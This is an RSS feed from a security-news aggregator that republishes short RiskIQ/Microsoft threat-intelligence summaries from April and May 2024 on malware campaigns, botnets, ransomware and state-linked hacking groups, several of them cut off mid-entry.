www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-14T20:49:39+00:00 www.secnews.physaphae.fr RiskIQ - cyber risk firms (now microsoft) Faits saillants hebdomadaires, 13 mai 2024<br>Weekly OSINT Highlights, 13 May 2024 2024-05-13T13:30:14+00:00 https://community.riskiq.com/article/fd207107 www.secnews.physaphae.fr/article.php?IdArticle=8498946 False Spam,Malware,Tool,Vulnerability,Threat,Cloud APT 42 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Llmjacking: des informations d'identification cloud volées utilisées dans une nouvelle attaque d'IA<br>LLMjacking: Stolen Cloud Credentials Used in New AI Attack #### Targeted Industries - Information Technology ## Snapshot The Sysdig Threat Research Team released a report on a new attack termed LLMjacking, where exploited cloud credentials are used to target large language model (LLM) services. ## Description The credentials used in this attack were acquired from a system running a vulnerable version of Laravel ([CVE-2021-3129](https://security.microsoft.com/intel-explorer/cves/CVE-2021-3129/)). While attacks against LLM-based AI systems are often discussed in the context of prompt abuse and altering training data, this attack aimed to sell LLM access to other cybercriminals while the cloud account owner footed the bill. Upon initial access, attackers exfiltrated cloud credentials and penetrated the cloud environment to target local LLM models hosted by cloud providers. Sysdig researchers discovered evidence of a reverse proxy for LLMs being used, suggesting financial motivation or the extraction of LLM training data. 
Th]]> 2024-05-10T21:39:05+00:00 https://community.riskiq.com/article/344e58e5 www.secnews.physaphae.fr/article.php?IdArticle=8497469 False Threat,Cloud None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Les pirates nord-coréens abusant de la console de gestion Facebook & MS<br>North Korean Hackers Abusing Facebook & MS Management Console ## Snapshot The North Korean hacking group Kimsuky has been observed using sophisticated methods to conduct espionage activities, including the exploitation of social media platforms and system management tools.  **Microsoft tracks Kimsuky as Emerald Sleet. [Read more about Emerald Sleet here.](https://security.microsoft.com/intel-profiles/f1e214422dcaf4fb337dc703ee4ed596d8ae16f942f442b895752ad9f41dd58e)** ## Description The group has been using fake Facebook profiles to target individuals involved in North Korean human rights and security affairs, engaging with potential targets through friend requests and personal messages. This social engineering tactic is designed to build trust and lure the targets into a trap, eventually leading to the sharing of malicious links or documents. Additionally, Kimsuky has adopted Microsoft Management Console (MMC) files, disguised as innocuous documents, to execute malicious commands on victims\' systems. Once opened, these files can potentially allow the attackers to gain control over the system or exfiltrate sensitive information, ultimately establishing a command and control (C2) channel to manage the compromised systems remotely. The use of social media platforms like Facebook for initial contact and the deployment of system management tools for executing attacks represents a significant escalation in cyber threat tactics. These methods indicate a shift towards more stealthy and socially engineered attacks that can bypass conventional security measures. 
The recent activities of the Kimsuky group underscore the continuous evolution of cyber threat actors and the need for robust cyb]]> 2024-05-10T19:33:41+00:00 https://community.riskiq.com/article/6e7f4a30 www.secnews.physaphae.fr/article.php?IdArticle=8497417 False Tool,Threat None 4.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Socgholish attaque les entreprises via de fausses mises à jour du navigateur<br>SocGholish Attacks Enterprises Via Fake Browser Updates ## Snapshot SocGholish (also known as FakeUpdates), a malware known for its stealth and the intricacy of its delivery mechanisms, is targeting enterprises with deceptive browser update prompts. ## Description As reported by eSentire, compromised legitimate websites serve as the infection vector, where malicious JavaScript code is injected to prompt users to download browser updates. The downloaded files contain SocGholish malware, initiating the infection process upon execution.  The script employs various techniques to avoid detection and evade analysis. First, it checks if the browser is being controlled by automation tools and terminates execution if detected. Subsequently, it scrutinizes if the browser window has undergone significant manipulation to determine if the environment is being monitored. Additionally, it inspects for specific WordPress cookies to halt further actions if the user is logged into a WordPress site. 
If none of these conditions apply, it establishes a mouse movement event listener, tr]]> 2024-05-10T16:50:08+00:00 https://community.riskiq.com/article/c5bf96a0 www.secnews.physaphae.fr/article.php?IdArticle=8497333 False Malware,Tool,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) The Darkgate Menace: Tireing AutoHotKey et tenter d'échapper à SmartScreen<br>The DarkGate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen 2024-05-09T16:44:05+00:00 https://community.riskiq.com/article/1db83f2c www.secnews.physaphae.fr/article.php?IdArticle=8496697 False Malware,Vulnerability,Threat,Cloud None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Mises à jour de Hijackloader<br>HijackLoader Updates ## Snapshot Researchers at Zscaler have published a report about the evolution of HijackLoader, a malware loader, and its new evasion tactics. ## Description HijackLoader, also known as IDAT Loader, emerged in 2023 as a malware loader equipped with versatile modules for injecting and executing code. HijackLoader has modular architecture, an attribute that sets it apart from typical loaders.  Zscaler researchers analyzed a new HijackLoader variant that features upgraded evasion techniques. These enhancements aim to aid in the malware\'s stealth, prolonging its ability to evade detection. The latest version of HijackLoader introduces modules to bypass Windows Defender Antivirus, circumvent User Account Control (UAC), evade inline API hooking commonly used by security tools, and utilize process hollowing. HijackLoader\'s delivery mechanism involves utilizing a PNG image, decrypted and parsed to load the subsequent stage of the attack. HijackLoader has been observed serving as a delivery mechinism for various malware families, including Amadey, [Lumma Stealer](https://sip.security.microsoft.com/intel-profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad), Racoon Stealer v2, and Remcos RAT. 
## Detections Microsoft Defender Antivirus detects threat components as the following malware: - [Trojan:Win32/HijackLoader](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/HijackLoader.AHJ!MTB&threatId=-2147058662) ## References [HijackLoader Updates](https://www.zscaler.com/blogs/security-research/hijackloader-updates). Zscaler (accessed 2024-05-09)]]> 2024-05-09T16:11:06+00:00 https://community.riskiq.com/article/8c997d7c www.secnews.physaphae.fr/article.php?IdArticle=8496698 False Malware,Tool,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Les pirates abusent des annonces de recherche Google pour livrer des logiciels malveillants pleins de MSI<br>Hackers Abuse Google Search Ads to Deliver MSI-Packed Malware 2024-05-09T00:49:06+00:00 https://community.riskiq.com/article/1f1ae96f www.secnews.physaphae.fr/article.php?IdArticle=8496261 False Ransomware,Malware,Tool,Threat,Prediction,Cloud None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Les pirates exploitent activement les vulnérabilités d'Ivanti Pulse Secure<br>Hackers Actively Exploiting Ivanti Pulse Secure Vulnerabilities ## Snapshot Juniper Threat Labs has reported that attackers are actively exploiting vulnerabilities in Ivanti Pulse Secure VPN appliances.  **Read more about Microsoft\'s coverage of [CVE-2023-46805 and CVE-2024-21887 here.](https://sip.security.microsoft.com/intel-profiles/cve-2023-46805)** ## Description The vulnerabilities, identified as CVE-2023-46805 and CVE-2024-21887, have been exploited to deliver the Mirai botnet, among other malware, posing a significant threat to network security worldwide. CVE-2023-46805 is a critical security flaw affecting Ivanti Connect Secure (ICS) and Ivanti Policy Secure gateways. This vulnerability allows remote attackers to bypass authentication mechanisms and gain unauthorized access to restricted resources. 
The second vulnerability, CVE-2024-21887, is a command injection flaw found in the web components of Ivanti Connect Secure and Ivanti Policy Secure. This vulnerability allows attackers to send specially crafted requests to execute arbitrary commands on the appliance. Attackers have used these vulnerabilities to deliver Mirai payloads through shell scripts.  Organizations using Ivanti Pulse Secure appliances are urged to apply the provided patches immediately and review their security posture to protect against these and future vulnerabilities. ## Recommendations As of January 31, 2024 Ivanti has released patches via the standard download portal for Ivanti Connect Secure (versions 9.1R14.4, 9.1R17.2, 9.1R18.3, 22.4R2.2 and 22.5R1.1) and ZTA version 22.6R1.3. Follow the [vendor\'s guide](https://forums.ivanti.com/s/article/How-to-The-Complete-Upgrade-Guide) to upgrade to a patched version. ## References "[Hackers Actively Exploiting Ivanti Pulse Secure Vulnerabilities](https://gbhackers.com/hackers-actively-exploiting/)" GBHackers. (Accessed 2024-05-08)]]> 2024-05-08T19:42:50+00:00 https://community.riskiq.com/article/2d95eb1b www.secnews.physaphae.fr/article.php?IdArticle=8496119 False Malware,Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) JFROG Security Research découvre les attaques coordonnées contre Docker Hub qui ont planté des millions de référentiels malveillants<br>JFrog Security Research Discovers Coordinated Attacks on Docker Hub that Planted Millions of Malicious Repositories ## Snapshot JFrog Security Research has discovered three large-scale malware campaigns that targeted Docker Hub, planting millions of "imageless" repositories with malicious metadata. ## Description Docker Hub is a platform that delivers many functionalities to developers, presenting numerous opportunities for development, collaboration, and distribution of Docker images. 
Currently, it is the number one container platform of choice for developers worldwide. Yet, a significant concern arises when considering the content of these public repositories. The research reveals that nearly 20% of these public repositories actually hosted malicious content.  These repositories do not contain container images but instead contain metadata that is malicious. The content ranged from simple spam that promotes pirated content, to extremely malicious entities such as malware and phishing sites, uploaded by automatically generated accounts. Prior to this publication, the JFrog research team disclosed all findings to the Docker security team, including 3.2M repositories that were suspected as hosting malicious or unwanted content. The Docker security team quickly removed all of the malicious and unwanted repositories from Docker Hub ## Recommendations JFrog Security Research reccommends Users should prefer using Docker images that are marked in Docker Hub as “Trusted Content”. ## References ["JFrog Security Research Discovers Coordinated Attacks on Docker Hub that Planted Millions of Malicious Repositories"](https://jfrog.com/blog/attacks-on-docker-with-millions-of-malicious-repositories-spread-malware-and-phishing-scams/#new_tab) JFrog. 
(Accessed 2024-05-07)]]> 2024-05-07T20:14:06+00:00 https://community.riskiq.com/article/64465418 www.secnews.physaphae.fr/article.php?IdArticle=8495482 False Spam,Malware None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Uncharmed: les opérations APT42 de l'Iran démêle<br>Uncharmed: Untangling Iran\\'s APT42 Operations 2024-05-06T19:54:46+00:00 https://community.riskiq.com/article/7c5aa156 www.secnews.physaphae.fr/article.php?IdArticle=8494794 False Malware,Vulnerability,Threat,Patching,Cloud APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Faits saillants hebdomadaires, 6 mai 2024<br>Weekly OSINT Highlights, 6 May 2024 2024-05-06T16:26:54+00:00 https://community.riskiq.com/article/157eab98 www.secnews.physaphae.fr/article.php?IdArticle=8494726 False Ransomware,Malware,Tool,Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Zloader apprend de vieilles astuces<br>ZLoader Learns Old Tricks ## Snapshot Researchers at Zscaler have published a report about the evolution of ZLoader, a modular banking trojan, and its new evasion tactics. Check out Microsoft\'s write-up on ZLoader [here](https://sip.security.microsoft.com/intel-profiles/cbcac2a1de4e52fa5fc4263829d11ba6f2851d6822569a3d3ba9669e72aff789). ## Description ZLoader, also known as Terdot, DELoader, or Silent Night, is a modular Trojan derived from leaked ZeuS source code. After nearly two years of absence, ZLoader resurfaced in September 2023 with a new version incorporating changes to its obfuscation methods, domain generation algorithm (DGA), and network communication. Recently, it has reintroduced an anti-analysis mechanism reminiscent of the original ZeuS 2.x code. This feature limits ZLoader\'s binary execution to the infected system, a trait that had been abandoned by many malware strains derived from the leaked source code until this recent development. 
## Detections Microsoft Defender Antivirus detects threat components as the following malware: - Trojan:Win64/ZLoader - Trojan:Win32/ZLoader ## References [ZLoader Learns Old Tricks](https://www.zscaler.com/blogs/security-research/zloader-learns-old-tricks#indicators-of-compromise--iocs-). Zscaler (accessed (2024-05-03) [ZLoader](https://sip.security.microsoft.com/intel-profiles/cbcac2a1de4e52fa5fc4263829d11ba6f2851d6822569a3d3ba9669e72aff789). Microsoft (accessed 2024-05-03) # ZLZLoaderoader]]> 2024-05-03T21:17:42+00:00 https://community.riskiq.com/article/0d7c21ec www.secnews.physaphae.fr/article.php?IdArticle=8493230 False Malware,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Nouveau Goldoon Botnet ciblant les appareils D-Link<br>New Goldoon Botnet Targeting D-Link Devices ## Snapshot FortiGuard Labs has identified the emergence of the "Goldoon" botnet, which targets D-Link devices by exploiting the CVE-2015-2051 vulnerability. This allows attackers to gain complete control of vulnerable systems and launch further attacks, including distributed denial-of-service (DDoS). ## Description The botnet\'s initial infiltration involves the exploitation of CVE-2015-2051 to download a file "dropper" from a specific URL, which then downloads the botnet file using an XOR key to decrypt specific strings. The "dropper" script is programmed to automatically download, execute, and clean up potentially malicious files across various Linux system architectures. After execution, the script removes the executed file and then deletes itself to erase any trace of its activity. Once executed, Goldoon establishes a persistent connection with its Command and Control (C2) server and waits for commands to launch related behaviors, including various denial-of-service attacks. The malware contains 27 different methods related to various attacks, posing a significant threat to affected organizations. 
These methods include ICMP Flooding, TCP Flooding, UDP Flooding, DNS Flooding, HTTP Bypass, HTTP Flooding, and Minecraft DDoS Attack. ## References "[New Goldoon Botnet Targeting D-Link Devices](https://www.fortinet.com/blog/threat-research/new-goldoon-botnet-targeting-d-link-devices)" FortiGuard Labs. (Accessed 2024-05-03)]]> 2024-05-03T20:21:03+00:00 https://community.riskiq.com/article/de08653e www.secnews.physaphae.fr/article.php?IdArticle=8493201 False Malware,Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Les acteurs menacés attaquent les serveurs MS-SQL pour déployer des ransomwares<br>Threat Actors Attacking MS-SQL Servers to Deploy Ransomware ## Snapshot Cybersecurity professionals at GBHackers have discovered a series of cyberattacks targeting poorly managed Microsoft SQL (MS-SQL) servers to install Mallox Ransomware on systems. **Read more about Microsoft\'s coverage for [Mallox Ransomware here.](https://sip.security.microsoft.com/intel-profiles/7fbe39c998c8a495a1652ac6f8bd34852c00f97dc61278cafc56dca1d443131e)** ## Description The threat actor group\'s modus operandi involves exploiting vulnerabilities in improperly managed MS-SQL servers. By employing brute force and dictionary attacks, the attackers gain unauthorized access, primarily targeting the SA (System Administrator) account.  Once inside, they deploy the Remcos Remote Access Tool (RAT) to take control of the infected system. Remcos RAT, initially used for system breach and control, has been repurposed by attackers for malicious activities, featuring capabilities such as keylogging, screenshot capture, and control over webcams and microphones.  Additionally, a custom-made remote screen control malware is deployed, allowing attackers to gain access to the infected system using the AnyDesk ID obtained from the command and control server. Mallox ransomware, known for targeting MS-SQL servers, was then installed to encrypt the system.  
Mallox ransomware, utilizes AES-256 and SHA-256 encryption algorithms, appending a ".rmallox" extension to encrypted files. The attack patterns observed in this campaign bear a striking resemblance to ]]> 2024-05-03T20:14:15+00:00 https://community.riskiq.com/article/f5f3ecc6 www.secnews.physaphae.fr/article.php?IdArticle=8493202 False Ransomware,Malware,Tool,Vulnerability,Threat,Technical None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Un opérateur rusé: le grand pare-feu de Metring Meerkat et China \\<br>A Cunning Operator: Muddling Meerkat and China\\'s Great Firewall ## Snapshot Infoblox published an analysis of a threat actor group dubbed Muddling Meerkat, suspected to be a nation-state actor affiliated with China, conducting sophisticated and long-running operations through the Domain Name System (DNS). ## Description Muddling Meerkat\'s approach centers around hijacking internet traffic through sophisticated DNS manipulation techniques, primarily by generating an extensive volume of DNS queries distributed widely via open DNS resolvers. This tactic allows them to exert control over internet traffic, directing it according to their objectives. Unlike conventional denial-of-service attacks aimed at causing service disruptions, Muddling Meerkat\'s primary goal appears to be the manipulation and redirection of internet traffic, highlighting a strategic rather than disruptive motive. Their activities, which began at least as early as October 2019, demonstrate a sustained and methodical approach by the group. 
The level of expertise displayed in DNS manipulation indicates a profound understanding of network infrastructure and DNS protocols, reflecting a sophisticated and well-re]]> 2024-05-02T19:30:20+00:00 https://community.riskiq.com/article/b6049233 www.secnews.physaphae.fr/article.php?IdArticle=8492593 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) La campagne de logiciels malveillants tente la maltraitance des binaires de sophos<br>Malware Campaign Attempts Abuse of Sophos Binaries 2024-05-01T20:56:45+00:00 https://community.riskiq.com/article/e27d7355 www.secnews.physaphae.fr/article.php?IdArticle=8492041 False Ransomware,Malware,Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Attaque "Stream Dirty": découvrir et atténuer un modèle de vulnérabilité commun dans les applications Android<br>“Dirty stream” attack: Discovering and mitigating a common vulnerability pattern in Android apps 2024-05-01T19:46:49+00:00 https://community.riskiq.com/article/ddb0878a www.secnews.physaphae.fr/article.php?IdArticle=8492016 False Tool,Vulnerability,Threat,Studies,Mobile,Technical None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Muddywater Campaign abuse d'agents Atera<br>MuddyWater Campaign Abusing Atera Agents 2024-05-01T19:01:06+00:00 https://community.riskiq.com/article/9a596ba8 www.secnews.physaphae.fr/article.php?IdArticle=8492017 False Malware,Tool,Threat,Medical,Commercial None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Les acteurs de la menace nord-coréenne utilisent de faux entretiens d'embauche pour cibler les développeurs<br>North Korean Threat Actors Use Fake Job Interviews to Target Developers #### Targeted Industries - Information Technology ## Snapshot The Securonix Threat Research Team has been monitoring a new ongoing social engineeri]]> 2024-05-01T01:13:37+00:00 https://community.riskiq.com/article/7ef7309c www.secnews.physaphae.fr/article.php?IdArticle=8491579 False 
Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) De ransomware icedid à Dagon Locker en 29 jours<br>From IcedID to Dagon Locker Ransomware in 29 Days ## Snapshot The DFIR report provides a detailed account of a sophisticated intrusion that began with a phishing campaign using PrometheusTDS to distribute IcedID malware in August 2023. ## Description The IcedID malware established persistence, communicated with C2 servers, and dropped a Cobalt Strike beacon, which was used for lateral movement, data exfiltration, and ransomware deployment. The threat actor also utilized a suite of tools such as Rclone, Netscan, Nbtscan, AnyDesk, Seatbelt, Sharefinder, and AdFind. The intrusion culminated in the deployment of Dagon Locker ransomware after 29 days. The threat actors employed various techniques to obfuscate the JavaScript file and the Cobalt Strike shellcode, evade detection, maintain persistence, and perform network enumeration activities. The threat actor\'s activities included the abuse of lateral movement functionalities such as PsExec and Remote Desktop Protocol (RDP), exfiltration of files, dumping and exfiltration of Windows Security event logs, and the use of PowerShell commands executed from the Cobalt Strike beacon. Additionally, the threat actor employed multiple exfiltration techniques, including the use of Rclone and AWS CLI to exfiltrate data from the compromised infrastructure. The deployment of the Dagon Locker ransomware was facilitated through the use of a custom PowerShell script, AWScollector, and a locker module, with a specific PowerShell command run from a domain controller to deploy the ransomware to different systems. The impact of this incident resulted in all systems being affected by the Dagon Locker ransomware. 
## References [https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/](https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/)]]> 2024-04-29T20:07:15+00:00 https://community.riskiq.com/article/55e96eb8 www.secnews.physaphae.fr/article.php?IdArticle=8490876 False Ransomware,Malware,Tool,Threat,Technical None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Faits saillants hebdomadaires, 29 avril 2024<br>Weekly OSINT Highlights, 29 April 2024 2024-04-29T16:05:58+00:00 https://community.riskiq.com/article/aa388c3b www.secnews.physaphae.fr/article.php?IdArticle=8490778 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Industrial None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Todckat APT Group Honne les tactiques d'expiltration des données, exploite les outils légitimes<br>ToddyCat APT Group Hones Data Exfiltration Tactics, Exploits Legitimate Tools 2024-04-26T19:12:08+00:00 https://community.riskiq.com/article/2641df15 www.secnews.physaphae.fr/article.php?IdArticle=8489234 False Ransomware,Spam,Malware,Tool,Threat,Industrial,Cloud None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Analyse de la campagne d'attaque # Frozen # Shadow en cours en tirant parti du logiciel malveillant SSLoad et du logiciel RMM pour la prise de contrôle du domaine<br>Analysis of Ongoing FROZEN#SHADOW Attack Campaign Leveraging SSLoad Malware and RMM Software for Domain Takeover #### Targeted Geolocations - Central Asia - East Asia - North America - Northern Europe - South America - South Asia - Southeast Asia - Southern Europe - Western Europe - Eastern Europe - Central America and the Caribbean ## Snapshot Researchers at Securonix have discovered an ongoing attack campaign using phishing emails to deliver a malware called SSLoad.  The campaign, named FROZEN#SHADOW, also involves the deployment of Cobalt Strike and the ConnectWise ScreenConnect remote desktop software. 
## Description According to Securonix, FROZEN#SHADOW victim organizations appear to be targeted randomly, but are concentrated in Europe, Asia, and the Americas. The attack methodology involves the distribution of phishing emails that contain links leading to the retrieval of a JavaScript file that initiates the infection process. Subsequently, the MSI installer connects to an attacker-controlled domain to fetch and execute the SSLoad malware payload, followed by beaconing to a command-and-control (C2) server along with system information. The initial reconnaissance phase sets the stage for the deployment of Cobalt Strike, a legitimate adversary simulation software, which is then leveraged to download and install ScreenConnect. This enables the threat actors to remotely commandeer the compromised host and achieve extensive persistence in the target environment. ## References [https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/](https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/) [https://thehackernews.com/2024/04/researchers-detail-multistage-attack.html](https://thehackernews.com/2024/04/researchers-detail-multistage-attack.html)]]> 2024-04-26T17:25:03+00:00 https://community.riskiq.com/article/e39d9bb3 www.secnews.physaphae.fr/article.php?IdArticle=8489190 False Malware,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Ransomware Roundup - KageNoHitobito and DoNex 2024-04-26T17:23:14+00:00 https://community.riskiq.com/article/ff848e92 www.secnews.physaphae.fr/article.php?IdArticle=8489191 False Ransomware,Malware,Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Les nouveaux logiciels malveillants Brokewell prennent le contrôle des appareils Android<br>New Brokewell Malware Takes Over Android Devices ## Snapshot ThreatFabric analysts have discovered a new mobile malware family called "Brokewell" that poses a 
significant threat to the banking industry. The malware is equipped with both data-stealing and remote-control capabilities, allowing attackers to gain remote access to all assets available through mobile banking. ## Description Brokewell uses overlay attacks to capture user credentials and can steal cookies by launching its own WebView. The malware also supports a variety of "spyware" functionalities, including collecting information about the device, call history, geolocation, and recording audio. After stealing the credentials, the actors can initiate a Device Takeover attack using remote control capabilities, giving them full control over the infected device. The malware is in active development, with new commands added almost daily.  ThreatFabric analysts discovered a fake browser update page designed to install an Android application that was used to distribute the malware. The malware is believed to be promoted on underground channels as a rental service, attracting the interest of other cybercriminals and sparking new campaigns targeting different regions. 
## References [https://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware](https://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware) [https://www.bleepingcomputer.com/news/security/new-brokewell-malware-takes-over-android-devices-steals-data/](https://www.bleepingcomputer.com/news/security/new-brokewell-malware-takes-over-android-devices-steals-data/)]]> 2024-04-25T18:53:33+00:00 https://community.riskiq.com/article/99a5deee www.secnews.physaphae.fr/article.php?IdArticle=8488684 False Malware,Threat,Mobile None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Campagne de malvertisation ciblant les équipes informatiques avec madmxshell<br>Malvertising Campaign Targeting IT Teams with MadMxShell ## Snapshot Between November 2023 and March 2024, Zscaler ThreatLabz observed a threat actor utilizing fake domains spoofing legitimate IP scanner software sites to distribute a new backdoor called "MadMxShell." The actor registered look-alike domains and employed Google Ads to push them to the top of search results, targeting specific keywords. ## Description MadMxShell employs a complex array of techniques to evade detection and establish communication with its command-and-control (C2) server. Beginning with a multi-stage injection process, the backdoor utilizes DLL sideloading and compression to obfuscate its presence. Upon execution, it initiates DNS tunneling for C2 communication, utilizing DNS MX queries and responses to transmit commands and receive instructions from the C2 server. The backdoor\'s payload is encoded within DNS packets, with each byte converted into alphanumeric characters using a custom encoding scheme. This encoding process allows for data transfer between the infected machine and the C2 server, with each DNS packet limited to a maximum size to avoid detection. 
Additionally, MadMxShell employs memory forensics evasion techniques, including anti-dumping measures, to hinder analysis and detection by security solutions. Zscaler ThreatLabz is unable to attribute this activity to any known threat actor at this time; however, it assesses that the TTPs are indicative of a sophisticated actor who may be interested in targeting IT professionals, specifically those in IT security and network administration roles. ## References [https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell](https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell)]]> 2024-04-24T21:21:49+00:00 https://community.riskiq.com/article/ffa6ca10 www.secnews.physaphae.fr/article.php?IdArticle=8488231 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Arcaneroor - Nouvelle campagne axée sur l'espionnage a trouvé des dispositifs de réseau de périmètre ciblant<br>ArcaneDoor - New Espionage-Focused Campaign Found Targeting Perimeter Network Devices ## Snapshot Cisco Talos reports on the ArcaneDoor campaign, attributed to the state-sponsored actor UAT4356 (Tracked by Microsoft as Storm-1849), targets perimeter network devices from multiple vendors, particularly Cisco Adaptive Security Appliances (ASA).  
Microsoft tracks this actor as Storm-1849, [read more about them here.](https://sip.security.microsoft.com/intel-profiles/f3676211c9f06910f7f1f233d81347c1b837bddd93292c2e8f2eb860a27ad8d5) #]]> 2024-04-24T19:34:05+00:00 https://community.riskiq.com/article/a0cf0328 www.secnews.physaphae.fr/article.php?IdArticle=8488184 False Malware,Tool,Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) KAPEKA: Un roman de porte dérobée repérée en Europe de l'Est<br>Kapeka: A Novel Backdoor Spotted in Eastern Europe #### Targeted Geolocations - Ukraine - Estonia - Eastern Europe ## Snapshot WithSecure has published research about a backdoor called "Kapeka," tracked by Microsoft as "KnuckleTouch," used in attacks in Eastern Europe since mid-2022. Kapeka functions as a versatile backdoor, providing both initial toolkit capabilities and long-term access to victims. Its sophistication suggests involvement by an APT group. WithSecure links Kapeka to Sandworm, tracked by Microsoft as Seashell Blizzard, a notorious Russian nation-state threat group associated with the GRU known for destructive attacks in Ukraine. **Microsoft tracks Sandworm as Seashell Blizzard.** [Read more about Seashell Blizzard here.](https://sip.security.microsoft.com/intel-profiles/cf1e406a16835d56cf614430aea3962d7ed99f01ee3d9ee3048078288e5201bb) **Microsoft tracks Kapeka as KnuckleTouch. **[Read more about Knuckletouch here.](https://sip.security.microsoft.com/intel-profiles/cdbe72d9f5f1ee3b3f8cd4e78a4a07f76addafdcc656aa2234a8051e8415d282) ## Description Kapeka overlaps with GreyEnergy and Prestige ransomware attacks, all attributed to Sandworm. WithSecure assesses it\'s likely that Kapeka is a recent addition to Sandworm\'s arsenal. The malware\'s dropper installs the backdoor, collecting machine and user information for the threat actor. However, the method of Kapeka\'s distribution remains unknown. 
Kapeka's emergence coincides with the Russia-Ukraine conflict, suggesting targeted attacks across Central and Eastern Europe since 2022. It may have been involved in the deployment of Prestige ransomware in late 2022. Kapeka is speculated to succeed GreyEnergy in Sandworm's toolkit, possibly replacing BlackEnergy.

## References

[https://labs.withsecure.com/publications/kapeka](https://labs.withsecure.com/publications/kapeka)

2024-04-23T16:31:06+00:00 https://community.riskiq.com/article/364efa92 www.secnews.physaphae.fr/article.php?IdArticle=8487526 False Ransomware,Malware,Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Botnets Continue Exploiting CVE-2023-1389 for Wide-Scale Spread

## Snapshot

Botnets such as Moobot, Miori, AGoent, and a Gafgyt variant are exploiting CVE-2023-1389, a vulnerability disclosed last year. It is an unauthenticated command injection vulnerability in the "locale" API exposed through the web management interface of the TP-Link Archer AX21 (AX1800).

## Description

Multiple botnets, including Moobot, Miori, AGoent, and the Gafgyt variant, have been observed exploiting this vulnerability. Each botnet employs its own methods of infection and attack: AGoent and the Gafgyt variant target Linux-based architectures to launch DDoS attacks, while Moobot initiates DDoS attacks on remote IPs after retrieving ELF files from a specific URL. The initial infiltration occurs through the unauthenticated command injection vulnerability in the "locale" API, which allows attackers to inject commands by manipulating the "country" form field and the "write" operation.
## References

[https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread](https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread)

2024-04-22T19:02:33+00:00 https://community.riskiq.com/article/244cbe20 www.secnews.physaphae.fr/article.php?IdArticle=8487003 False Vulnerability None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Weekly OSINT Highlights, 22 April 2024 2024-04-22T15:04:06+00:00 https://community.riskiq.com/article/03b84c13 www.secnews.physaphae.fr/article.php?IdArticle=8486904 False Vulnerability,Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Threat Group FIN7 Targets the U.S. Automotive Industry

#### Targeted Geolocations
- United States

## Snapshot

In late 2023, BlackBerry analysts detected a spear-phishing campaign launched by FIN7, tracked by Microsoft as Sangria Tempest, targeting a US-based automotive manufacturer.

## Description

The attackers concentrated on employees within the IT department possessing elevated administrative privileges, luring them with an offer of a free IP scanning tool that concealed the Anunak backdoor. This incident demonstrates a shift in FIN7's efforts from widespread targeting to more precise targeting of high-value sectors such as transportation and defense. Upon clicking on embedded URLs, victims were directed to malicious websites, part of a typosquatting scheme, which facilitated the download and execution of the Anunak backdoor onto their systems. The use of living-off-the-land binaries, scripts, and libraries (LOLBAS) masked the malicious activity, aiding the attackers' initial foothold. Furthermore, the malware execution flow involved intricate multi-stage processes, including the decryption and execution of payloads such as Anunak, and the establishment of persistence through OpenSSH.
During the delivery phase of this campaign, the fake lure website, "advanced-ip-sccanner\[.\]com," redirected to "myipscanner\[.\]com." BlackBerry analysts found multiple domains registered within minutes of the original on the same provider, illustrating that this activity is likely not limited to this attack but is instead part of a wider campaign by FIN7.

## References

[https://blogs.blackberry.com/en/2024/04/fin7-targets-the-united-states-automotive-industry](https://blogs.blackberry.com/en/2024/04/fin7-targets-the-united-states-automotive-industry)

2024-04-18T20:37:30+00:00 https://community.riskiq.com/article/e14e343c www.secnews.physaphae.fr/article.php?IdArticle=8484949 False Malware,Tool,Threat None 2.0000000000000000

